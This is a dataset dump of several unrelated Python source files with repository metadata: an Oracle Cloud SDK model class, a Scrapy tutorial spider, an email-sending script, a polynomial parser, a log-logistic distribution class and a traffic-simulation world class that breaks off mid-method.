max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/oci/core/models/update_drg_attachment_details.py | LaudateCorpus1/oci-python-sdk | 0 | 12760951 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDrgAttachmentDetails(object):
    """
    UpdateDrgAttachmentDetails model.
    Plain data-holder for the updatable fields of a DRG attachment; all
    attributes are optional and populated from **kwargs by the
    @init_model_state_from_kwargs decorator.
    """
    def __init__(self, **kwargs):
        """
        Initializes a new UpdateDrgAttachmentDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):
        :param display_name:
            The value to assign to the display_name property of this UpdateDrgAttachmentDetails.
        :type display_name: str
        :param drg_route_table_id:
            The value to assign to the drg_route_table_id property of this UpdateDrgAttachmentDetails.
        :type drg_route_table_id: str
        :param network_details:
            The value to assign to the network_details property of this UpdateDrgAttachmentDetails.
        :type network_details: oci.core.models.DrgAttachmentNetworkUpdateDetails
        :param defined_tags:
            The value to assign to the defined_tags property of this UpdateDrgAttachmentDetails.
        :type defined_tags: dict(str, dict(str, object))
        :param freeform_tags:
            The value to assign to the freeform_tags property of this UpdateDrgAttachmentDetails.
        :type freeform_tags: dict(str, str)
        :param export_drg_route_distribution_id:
            The value to assign to the export_drg_route_distribution_id property of this UpdateDrgAttachmentDetails.
        :type export_drg_route_distribution_id: str
        :param route_table_id:
            The value to assign to the route_table_id property of this UpdateDrgAttachmentDetails.
        :type route_table_id: str
        """
        # Python attribute name -> Swagger/OpenAPI type string, used by the
        # SDK's (de)serialization machinery.
        self.swagger_types = {
            'display_name': 'str',
            'drg_route_table_id': 'str',
            'network_details': 'DrgAttachmentNetworkUpdateDetails',
            'defined_tags': 'dict(str, dict(str, object))',
            'freeform_tags': 'dict(str, str)',
            'export_drg_route_distribution_id': 'str',
            'route_table_id': 'str'
        }
        # Python attribute name -> JSON key used on the wire.
        self.attribute_map = {
            'display_name': 'displayName',
            'drg_route_table_id': 'drgRouteTableId',
            'network_details': 'networkDetails',
            'defined_tags': 'definedTags',
            'freeform_tags': 'freeformTags',
            'export_drg_route_distribution_id': 'exportDrgRouteDistributionId',
            'route_table_id': 'routeTableId'
        }
        # Backing fields for the properties below; the decorator assigns any
        # matching values passed in **kwargs.
        self._display_name = None
        self._drg_route_table_id = None
        self._network_details = None
        self._defined_tags = None
        self._freeform_tags = None
        self._export_drg_route_distribution_id = None
        self._route_table_id = None
    @property
    def display_name(self):
        """
        Gets the display_name of this UpdateDrgAttachmentDetails.
        A user-friendly name. Does not have to be unique, and it's changeable.
        Avoid entering confidential information.
        :return: The display_name of this UpdateDrgAttachmentDetails.
        :rtype: str
        """
        return self._display_name
    @display_name.setter
    def display_name(self, display_name):
        """
        Sets the display_name of this UpdateDrgAttachmentDetails.
        A user-friendly name. Does not have to be unique, and it's changeable.
        Avoid entering confidential information.
        :param display_name: The display_name of this UpdateDrgAttachmentDetails.
        :type: str
        """
        self._display_name = display_name
    @property
    def drg_route_table_id(self):
        """
        Gets the drg_route_table_id of this UpdateDrgAttachmentDetails.
        The `OCID`__ of the DRG route table that is assigned to this attachment.
        The DRG route table manages traffic inside the DRG.
        You can't remove a DRG route table from a DRG attachment, but you can reassign which
        DRG route table it uses.
        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        :return: The drg_route_table_id of this UpdateDrgAttachmentDetails.
        :rtype: str
        """
        return self._drg_route_table_id
    @drg_route_table_id.setter
    def drg_route_table_id(self, drg_route_table_id):
        """
        Sets the drg_route_table_id of this UpdateDrgAttachmentDetails.
        The `OCID`__ of the DRG route table that is assigned to this attachment.
        The DRG route table manages traffic inside the DRG.
        You can't remove a DRG route table from a DRG attachment, but you can reassign which
        DRG route table it uses.
        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        :param drg_route_table_id: The drg_route_table_id of this UpdateDrgAttachmentDetails.
        :type: str
        """
        self._drg_route_table_id = drg_route_table_id
    @property
    def network_details(self):
        """
        Gets the network_details of this UpdateDrgAttachmentDetails.
        :return: The network_details of this UpdateDrgAttachmentDetails.
        :rtype: oci.core.models.DrgAttachmentNetworkUpdateDetails
        """
        return self._network_details
    @network_details.setter
    def network_details(self, network_details):
        """
        Sets the network_details of this UpdateDrgAttachmentDetails.
        :param network_details: The network_details of this UpdateDrgAttachmentDetails.
        :type: oci.core.models.DrgAttachmentNetworkUpdateDetails
        """
        self._network_details = network_details
    @property
    def defined_tags(self):
        """
        Gets the defined_tags of this UpdateDrgAttachmentDetails.
        Defined tags for this resource. Each key is predefined and scoped to a
        namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :return: The defined_tags of this UpdateDrgAttachmentDetails.
        :rtype: dict(str, dict(str, object))
        """
        return self._defined_tags
    @defined_tags.setter
    def defined_tags(self, defined_tags):
        """
        Sets the defined_tags of this UpdateDrgAttachmentDetails.
        Defined tags for this resource. Each key is predefined and scoped to a
        namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :param defined_tags: The defined_tags of this UpdateDrgAttachmentDetails.
        :type: dict(str, dict(str, object))
        """
        self._defined_tags = defined_tags
    @property
    def freeform_tags(self):
        """
        Gets the freeform_tags of this UpdateDrgAttachmentDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair with no
        predefined name, type, or namespace. For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :return: The freeform_tags of this UpdateDrgAttachmentDetails.
        :rtype: dict(str, str)
        """
        return self._freeform_tags
    @freeform_tags.setter
    def freeform_tags(self, freeform_tags):
        """
        Sets the freeform_tags of this UpdateDrgAttachmentDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair with no
        predefined name, type, or namespace. For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
        :param freeform_tags: The freeform_tags of this UpdateDrgAttachmentDetails.
        :type: dict(str, str)
        """
        self._freeform_tags = freeform_tags
    @property
    def export_drg_route_distribution_id(self):
        """
        Gets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
        The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
        are advertised out through the attachment.
        If this value is null, no routes are advertised through this attachment.
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
        :return: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
        :rtype: str
        """
        return self._export_drg_route_distribution_id
    @export_drg_route_distribution_id.setter
    def export_drg_route_distribution_id(self, export_drg_route_distribution_id):
        """
        Sets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
        The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
        are advertised out through the attachment.
        If this value is null, no routes are advertised through this attachment.
        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
        :param export_drg_route_distribution_id: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
        :type: str
        """
        self._export_drg_route_distribution_id = export_drg_route_distribution_id
    @property
    def route_table_id(self):
        """
        Gets the route_table_id of this UpdateDrgAttachmentDetails.
        This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
        For information about why you would associate a route table with a DRG attachment, see:
        * `Transit Routing: Access to Multiple VCNs in Same Region`__
        * `Transit Routing: Private Access to Oracle Services`__
        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
        __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
        :return: The route_table_id of this UpdateDrgAttachmentDetails.
        :rtype: str
        """
        return self._route_table_id
    @route_table_id.setter
    def route_table_id(self, route_table_id):
        """
        Sets the route_table_id of this UpdateDrgAttachmentDetails.
        This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
        For information about why you would associate a route table with a DRG attachment, see:
        * `Transit Routing: Access to Multiple VCNs in Same Region`__
        * `Transit Routing: Private Access to Oracle Services`__
        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
        __ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
        :param route_table_id: The route_table_id of this UpdateDrgAttachmentDetails.
        :type: str
        """
        self._route_table_id = route_table_id
    def __repr__(self):
        return formatted_flat_dict(self)
    def __eq__(self, other):
        if other is None:
            return False
        # Structural equality: two models are equal when all fields match.
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not self == other
| 2.03125 | 2 |
hello-world/helloworld/spiders/hello.py | beifengle/tutorial-scrapy | 0 | 12760952 | <gh_stars>0
import scrapy
from helloworld.items import HelloworldItem
from scrapy.shell import inspect_response
from scrapy.utils.response import open_in_browser
class HelloSpider(scrapy.Spider):
    """Tutorial spider that extracts the page <title> from toscrape.com."""
    name = 'hello'  # unique name identifying this spider within the project
    allowed_domains = ['toscrape.com']  # domains the spider may crawl
    start_urls = ['http://toscrape.com/']  # initial URL(s) to fetch
    def parse(self, response):
        ''' Scrapy Contracts rules (checked by `scrapy check`)
        @url http://toscrape.com/
        @returns items 1 5
        @returns requests 0 1
        @scrapes title
        '''
        # inspect_response(response, self)  # section 2.8: break into a scrapy shell here for debugging
        # open_in_browser(response)  # section 2.8: open the downloaded response body in a browser
        title = response.xpath('//title/text()').extract_first("")
        print("解析提取到title:",title)
        hello_item = HelloworldItem()
        hello_item['title'] = title
        import time
        # Deliberate 5 s delay -- demo code; slows the crawl on purpose.
        time.sleep(5)
        # from scrapy.exceptions import CloseSpider
        # raise CloseSpider(reason="I do not want to crawl any more.")
        yield hello_item
        # yield scrapy.Request(url="http://books.toscrape.com/",  # section 2.8: sample for `scrapy parse` testing
        #                      dont_filter=True,
        #                      callback=self.parse_2)
    def parse_2(self, response):
        ''' Scrapy Contracts rules (checked by `scrapy check`)
        @url http://books.toscrape.com/
        @returns items 1 5
        @scrapes title
        '''
        title = response.xpath('//title/text()').extract_first("").strip()
        print("解析提取到title2:", title)
        hello_item = HelloworldItem()
        hello_item['title'] = title
        yield hello_item
    def closed(self, reason):
        # Lifecycle hook: called once when the spider shuts down.
        print('===爬虫关闭原因===:', reason)
| 3.140625 | 3 |
algorithm/common.py | VatsalP/algorithm | 0 | 12760953 | <filename>algorithm/common.py
from typing import *
T = TypeVar('T')
| 1.40625 | 1 |
Mailautomation.py | akpythonyt/Mystuffs | 47 | 12760954 | <reponame>akpythonyt/Mystuffs
import yagmail
# Minimal yagmail demo: send one message with an attachment.
receiver = "reciever email"  # placeholder: replace with the recipient's address
# Subject body plus an attachment path; yagmail presumably treats an existing
# file path in the contents as an attachment -- verify against yagmail docs.
message = ("Hello there from Yagmai",'Test1.pdf')
sender = yagmail.SMTP("sender email")  # placeholder: replace with the sender's address
sender.send(
	to=receiver,
	subject="Yagmail test with attachment",
	contents=message
)
| 1.992188 | 2 |
api_search_media.py | Ella-Botti/ella-backend | 0 | 12760955 | import json
import urllib.request
from dotenv import load_dotenv
import os
from pathlib import Path
from urllib.parse import quote
# Configuration needed to use the .env file (loads Yle API credentials).
dotenv_path = Path('./.env')
load_dotenv(dotenv_path=dotenv_path)
API_KEY = os.getenv('API_KEY')  # Yle API key; None if missing from the environment
API_ID = os.getenv('API_ID')    # Yle application id; None if missing
def get_media(keyword, type) :
    """Search the Yle programs API for items matching ``keyword``.

    :param keyword: free-text search term; percent-encoded before use
    :param type: programme type filter passed straight into the API query
        (the name shadows the builtin but is kept for caller compatibility)
    :return: list of Yle Areena URLs, one per matching programme
    """
    # Percent-encode the keyword so spaces etc. are legal in the URL.
    keyword = quote(keyword)
    url = ('https://external.api.yle.fi/v1/programs/items.json'
           f'?q={keyword}&type={type}&app_key={API_KEY}&app_id={API_ID}')
    with urllib.request.urlopen(url) as response:
        media = json.loads(response.read())
    # Build an Areena link for every item in the result set.
    return [f'http://areena.yle.fi/{item["id"]}' for item in media['data']]
def get_tag(type, category):
    """List Yle programmes of the given ``type`` within ``category``.

    :param type: programme type filter (name kept for caller compatibility)
    :param category: Yle category identifier
    :return: list of Yle Areena URLs, one per matching programme
    """
    url = ('https://external.api.yle.fi/v1/programs/items.json'
           f'?type={type}&category={category}&app_key={API_KEY}&app_id={API_ID}')
    with urllib.request.urlopen(url) as response:
        media = json.loads(response.read())
    # Build an Areena link for every item in the result set.
    return [f'http://areena.yle.fi/{item["id"]}' for item in media['data']]
| 2.609375 | 3 |
14.py | jsplyy/PythonTip | 0 | 12760956 | <reponame>jsplyy/PythonTip
import this  # importing prints the Zen of Python once

# The module stores the Zen text rot13-encoded in `this.s`.  The original
# used Python 2 statement syntax (`print this.s`); Python 3 requires the
# function form.
print(this.s)
archive/old_poly_conversion.py | HypenauticPulse/HypeCAS | 1 | 12760957 | <reponame>HypenauticPulse/HypeCAS<filename>archive/old_poly_conversion.py<gh_stars>1-10
def poly_conversion_array(eq, var):
    """Parse a polynomial string ``eq`` in variable ``var`` into
    ``[coefficient, power]`` float pairs.

    Example::

        poly_conversion_array("3x^2 + 2x - 5", "x")
        -> [[3.0, 2.0], [2.0, 1.0], [-5.0, 0.0]]

    Fixes over the previous version:
    * multi-digit exponents (``x^12``) parse correctly -- the old code read
      only the first character after ``^`` (and discarded the result of
      ``Temp.split('^')``)
    * bare ``-x`` / ``+x`` terms no longer crash on ``float('-')``

    :raises ValueError: on a malformed term (non-numeric text after ``var``).
    """
    tokens = eq.split()
    # Re-attach standalone sign tokens ("+", "-") to the term that follows.
    terms = []
    i = 0
    while i < len(tokens):
        if tokens[i] in ('+', '-') and i + 1 < len(tokens):
            terms.append(tokens[i] + tokens[i + 1])
            i += 2
        else:
            terms.append(tokens[i])
            i += 1
    coeff_power = []
    for term in terms:
        coeff_str, sep, exp_str = term.partition(var)
        if not sep:
            # No variable present: constant term, power 0.
            coeff_power.append([float(term), 0.0])
            continue
        # Implicit coefficients: "x" -> 1, "+x" -> 1, "-x" -> -1.
        if coeff_str in ('', '+'):
            coeff = 1.0
        elif coeff_str == '-':
            coeff = -1.0
        else:
            coeff = float(coeff_str)
        if exp_str == '':
            power = 1.0
        elif exp_str.startswith('^'):
            power = float(exp_str[1:])
        else:
            raise ValueError(f'malformed term: {term!r}')
        coeff_power.append([coeff, power])
    return coeff_power
# Banner: green ruled lines around the title, `a` columns wide.
# (The original first line carried dataset-dump residue fused before
# `a = 50`, which is not valid Python; it has been stripped.)
a = 50
print('\033[32m_\033[m' * a)
print(f'\033[1;32m{"SISTEMA DE CALCULO DE AREA":=^{a}}\033[m')
print('\033[32m-\033[m' * a)
def area(a, b):
    """Print and return the area (m²) of an ``a`` x ``b`` rectangle.

    The original computed and printed the area but returned None; returning
    the value is backward compatible and lets callers reuse it.
    """
    tot = a * b
    print(f'\033[1;34mA area de um terreno de {a:.2f} x {b:.2f} é de {tot:.2f}m².\033[m')
    return tot
# Interactive entry point: read the terrain dimensions and report its area.
larg = float(input('\033[35mLargura do terreno (m): '))  # width in metres
comp = float(input('\033[35mComprimento do terreno (m): '))  # length in metres
area(larg, comp)
| 3.53125 | 4 |
surpyval/parametric/loglogistic.py | dfm/SurPyval | 0 | 12760959 | <gh_stars>0
import autograd.numpy as np
from scipy.stats import uniform
from numpy import euler_gamma
from scipy.special import gamma as gamma_func
from scipy.special import ndtri as z
from surpyval import xcn_handler
from surpyval import parametric as para
from surpyval.parametric.parametric_fitter import ParametricFitter
class LogLogistic_(ParametricFitter):
    """Log-logistic (Fisk) distribution fitter.

    Parameterised by a scale ``alpha`` and shape ``beta``; the support is
    (0, inf).  Instantiated once at module level as ``LogLogistic``.
    """
    def __init__(self, name):
        self.name = name
        # Two fitted parameters (alpha, beta) -- matches bounds/param_names.
        self.k = 2
        # Both parameters are lower-bounded at 0 and unbounded above.
        self.bounds = ((0, None), (0, None),)
        self.support = (0, np.inf)
        # Probability-plot configuration: log x-axis and CDF gridline levels.
        self.plot_x_scale = 'log'
        self.y_ticks = [0.0001, 0.0002, 0.0003, 0.001, 0.002,
            0.003, 0.005, 0.01, 0.02, 0.03, 0.05,
            0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8,
            0.9, 0.95, 0.99, 0.999, 0.9999]
        self.param_names = ['alpha', 'beta']
        self.param_map = {
            'alpha' : 0,
            'beta'  : 1
        }
    def _parameter_initialiser(self, x, c=None, n=None, t=None, offset=False):
        # Initial parameter guesses for the optimiser.  With an offset
        # (3-parameter form) a location guess is placed just below the
        # sample minimum; otherwise a probability-plot (MPP) fit seeds
        # (alpha, beta).
        if offset:
            # return *self.fit(x, c, n, t, how='MPP').params, 1.
            x, c, n = xcn_handler(x, c, n)
            flag = (c == 0).astype(int)
            value_range = np.max(x) - np.min(x)
            gamma_init = np.min(x) - value_range / 10
            return gamma_init, x.sum() / (n * flag).sum(), 2., 1.
        else:
            return self.fit(x, c, n, t, how='MPP').params
        # x, c, n = surpyval.xcn_handler(x, c, n)
        # flag = (c == 0).astype(int)
        # return x.sum() / (n * flag).sum(), 2.
    def sf(self, x, alpha, beta):
        r"""
        Survival (or reliability) function for the LogLogistic Distribution:
        .. math::
            R(x) = 1 - \frac{1}{1 + \left ( x /\alpha \right )^{-\beta}}
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        sf : scalar or numpy array
            The value(s) of the reliability function at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.sf(x, 3, 4)
        array([0.62245933, 0.5621765 , 0.5       , 0.4378235 , 0.37754067])
        """
        return 1 - self.ff(x, alpha, beta)
    def cs(self, x, X, alpha, beta):
        r"""
        Conditional survival function for the LogLogistic Distribution:
        .. math::
            R(x, X) = \frac{R(x + X)}{R(X)}
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        X : numpy array or scalar
            The value(s) at which each value(s) in x was known to have survived
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        cs : scalar or numpy array
            The value(s) of the conditional survival function at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.cs(x, 5, 3, 4)
        array([0.51270879, 0.28444803, 0.16902083, 0.10629329, 0.07003273])
        """
        return self.sf(x + X, alpha, beta) / self.sf(X, alpha, beta)
    def ff(self, x, alpha, beta):
        r"""
        Failure (CDF or unreliability) function for the LogLogistic Distribution:
        .. math::
            F(x) = \frac{1}{1 + \left ( x /\alpha \right )^{-\beta}}
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        ff : scalar or numpy array
            The value(s) of the failure function at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.ff(x, 3, 4)
        array([0.01219512, 0.16494845, 0.5       , 0.75964392, 0.88526912])
        """
        return 1. / (1 + (x/alpha)**-beta)
    def df(self, x, alpha, beta):
        r"""
        Density function for the LogLogistic Distribution:
        .. math::
            f(x) = \frac{\left ( \beta / \alpha \right ) \left ( x / \alpha \right )^{\beta - 1}}{\left ( 1 + \left ( x / \alpha \right )^{-\beta} \right )^2}
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        df : scalar or numpy array
            The value(s) of the failure function at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.df(x, 3, 4)
        array([0.0481856 , 0.27548092, 0.33333333, 0.18258504, 0.08125416])
        """
        return ((beta/alpha)*(x/alpha)**(beta-1.))/((1. + (x/alpha)**beta)**2.)
    def hf(self, x, alpha, beta):
        r"""
        Instantaneous hazard rate for the LogLogistic Distribution:
        .. math::
            h(x) = \frac{f(x)}{R(x)}
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        hf : scalar or numpy array
            The value(s) of the instantaneous hazard rate at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.hf(x, 3, 4)
        array([0.04878049, 0.32989691, 0.66666667, 0.75964392, 0.7082153 ])
        """
        return self.df(x, alpha, beta) / self.sf(x, alpha, beta)
    def Hf(self, x, alpha, beta):
        r"""
        Cumulative hazard rate for the LogLogistic Distribution:
        .. math::
            H(x) = -\ln \left ( R(x) \right )
        Parameters
        ----------
        x : numpy array or scalar
            The values at which the function will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        Hf : scalar or numpy array
            The value(s) of the cumulative hazard rate at x.
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> x = np.array([1, 2, 3, 4, 5])
        >>> LogLogistic.Hf(x, 3, 4)
        array([0.01227009, 0.18026182, 0.69314718, 1.42563378, 2.16516608])
        """
        return -np.log(self.sf(x, alpha, beta))
    def qf(self, p, alpha, beta):
        r"""
        Quantile function for the LogLogistic distribution:
        .. math::
            q(p) = \alpha \left ( \frac{p}{1 - p} \right )^{\frac{1}{\beta}}
        Parameters
        ----------
        p : numpy array or scalar
            The percentiles at which the quantile will be calculated
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        q : scalar or numpy array
            The quantiles for the LogLogistic distribution at each value p
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> p = np.array([.1, .2, .3, .4, .5])
        >>> LogLogistic.qf(p, 3, 4)
        array([1.73205081, 2.12132034, 2.42732013, 2.71080601, 3.        ])
        """
        return alpha * (p/(1 - p))**(1./beta)
    def mean(self, alpha, beta):
        r"""
        Mean of the LogLogistic distribution
        .. math::
            E = \frac{\alpha \pi / \beta}{sin \left ( \pi / \beta \right )}
        Parameters
        ----------
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        mean : scalar or numpy array
            The mean(s) of the LogLogistic distribution
        Examples
        --------
        >>> from surpyval import LogLogistic
        >>> LogLogistic.mean(3, 4)
        3
        """
        # The mean is undefined for beta <= 1, hence the nan branch.
        if beta > 1:
            return (alpha * np.pi / beta) / (np.sin(np.pi/beta))
        else:
            return np.nan
    def random(self, size, alpha, beta):
        r"""
        Draws random samples from the distribution in shape `size`
        Parameters
        ----------
        size : integer or tuple of positive integers
            Shape or size of the random draw
        alpha : numpy array or scalar
            scale parameter for the LogLogistic distribution
        beta : numpy array or scalar
            shape parameter for the LogLogistic distribution
        Returns
        -------
        random : scalar or numpy array
            Random values drawn from the distribution in shape `size`
        Examples
        --------
        >>> import numpy as np
        >>> from surpyval import LogLogistic
        >>> LogLogistic.random(10, 3, 4)
        array([4.46072122, 2.1336253 , 2.74159711, 2.90125715, 3.2390347 ,
               5.45223664, 4.28281376, 2.7017541 , 3.023811  , 2.16225601])
        >>> LogLogistic.random((5, 5), 3, 4)
        array([[1.97744499, 4.02823921, 1.95761719, 1.20481591, 3.7166738 ],
               [2.94863864, 3.02609811, 3.30563774, 2.39100075, 3.24937459],
               [3.16102391, 1.77003533, 4.73831093, 0.36936215, 1.41566853],
               [3.88505024, 2.88183095, 2.43977804, 2.62385959, 3.40881857],
               [1.2349273 , 1.83914641, 3.68502568, 6.49834769, 8.62995574]])
        """
        # Inverse-transform sampling: push uniform draws through the quantile
        # function.
        U = uniform.rvs(size=size)
        return self.qf(U, alpha, beta)
    def mpp_x_transform(self, x, gamma=0):
        # Probability-plot x transform: log of the (optionally shifted) data.
        return np.log(x - gamma)
    def mpp_y_transform(self, y, *params):
        # Probability-plot y transform: logit of the CDF value.  Exact 0/1
        # values are masked to nan to avoid division by zero.
        mask = ((y == 0) | (y == 1))
        out = np.zeros_like(y)
        out[~mask] = -np.log(1./y[~mask] - 1)
        out[mask] = np.nan
        return out
    def mpp_inv_y_transform(self, y, *params):
        # Inverse of mpp_y_transform (logistic function).
        return 1./(np.exp(-y) + 1)
    def unpack_rr(self, params, rr):
        # Convert rank-regression slope/intercept into (alpha, beta),
        # depending on whether y was regressed on x ('y') or x on y ('x').
        if rr == 'y':
            beta = params[0]
            alpha = np.exp(params[1]/-beta)
        elif rr == 'x':
            beta = 1./params[0]
            alpha = np.exp(params[1] / (beta * params[0]))
        return alpha, beta
LogLogistic = LogLogistic_('LogLogistic') | 2.203125 | 2 |
Lang/Python/dll/pyc/calc/demo.py | Orig5826/Basics | 5 | 12760960 | <reponame>Orig5826/Basics
import os
import calc_module as calc
# Demo for the native calc_module extension: print i and py_get_squre(i)
# (presumably i squared -- py_get_squre is an external module; verify),
# ten results per row.
print("乘方计算:")
for i in range(100):
    ret = calc.py_get_squre(i)
    print("{0:4d}={1:4.0f} ".format(i, ret), end='')
    # Break the line after every tenth result.
    if (i+1) % 10 == 0:
        print()
# Windows-only: keep the console window open until a key is pressed.
os.system("pause")
| 2.921875 | 3 |
env.py | hiwonjoon/cs391-reinforce | 4 | 12760961 | # -*- coding: utf-8 -*-
import better_exceptions
import random
import numpy as np
import math
from asciimatics.screen import Screen
class ViolateRule:
    """Lightweight notification yielded by game objects when a traffic rule
    is broken (e.g. running a red light, crashing)."""
    def __init__(self, message):
        # Human-readable description of the violation.
        self.message = message
class World(object) :
    """Simulation world: a cyclic road of `road_length` cells with fixed
    rows (sidewalk / two road lanes each way / lights row), a list of game
    objects, and an asciimatics-based renderer."""
    line_alloc = [1,2,2,1,1] #side_walk, road, road, side_walk, traffic_light
    # Row indices on screen belonging to each group in line_alloc.
    line_range = [[0],[1,2],[3,4],[5],[6]]
    road_length=100
    """
    _t = 0
    _range = [] #for coordinate transform(due to line drawing)
    for line in self.line_alloc :
        _range.append(range(_t,_t+line))
        _t += line
    """
    def __init__(self,time_step=1.0/100) :
        # Simulated seconds elapsed and the fixed step per tick().
        self.global_time = 0.0
        self.time_step = time_step
        self.objects = []
        #debug message
        self.debug_list = []
        self.message = []
    def add_obj(self,obj,debug=False) :
        # Register a GameObject; debug=True routes its rule violations to
        # the on-screen message list.  Returns self for chaining.
        assert(isinstance(obj,GameObject))
        self.objects.append(obj)
        if( debug ) :
            self.debug_list.append(obj)
        return self
    def tick(self) :
        """Advance the world one time step; returns the step size."""
        # Tick
        # Each object's tick() is a generator that may yield ViolateRule
        # notifications (or None).
        for obj in self.objects:
            for e in obj.tick(self.time_step) :
                if( e is not None and obj in self.debug_list ):
                    self.message.append(e.message)
        # Interaction
        # O(n^2) pairwise pass; interact() mutates only obj_a.
        for obj_a in self.objects :
            for obj_b in self.objects :
                if( obj_a == obj_b ) : continue
                for e in obj_a.interact(obj_b,self.time_step) :
                    if( e is not None and obj_a in self.debug_list ):
                        self.message.append(e.message)
        # Constraint Check(Interaction with wall..) or Delteable Object
        for obj in self.objects: pass #TODO: Nothing to do for now.
        # Sweep objects flagged for removal.
        self.objects = [obj for obj in self.objects if not obj.remove]
        self.global_time += self.time_step
        return self.time_step
    def draw_lines(self,screen) : # Let's draw lines/one time call
        # Horizontal separators between row groups; colour codes are
        # asciimatics palette indices.
        _t = 0
        for line,c in zip(self.line_alloc[:-1],[7,3,7,1,4]) :
            screen.move(0,_t+line)
            screen.draw(self.road_length,_t+line,thin=True,colour=c)
            _t += line+1
    def draw(self,screen) :
        """Render every object plus debug info onto the screen."""
        # Rasterise objects into a (x, y) occupancy grid; later objects at
        # the same cell overwrite earlier ones.
        current_map = np.empty((self.road_length,sum(self.line_alloc)),dtype=object)
        for obj in self.objects: current_map[obj.loc[0],obj.loc[1]] = obj
        # Let's draw objects
        # The y offset ([k for k,...][-1]) shifts each row group down to
        # account for the separator lines drawn between groups.
        for x in range(self.road_length) :
            for y in range(sum(self.line_alloc)) :
                if( current_map[x,y] is None ) :
                    screen.print_at(' ', x,y+[k for k,_t in enumerate(self.line_range) if y in _t][-1] )
                else :
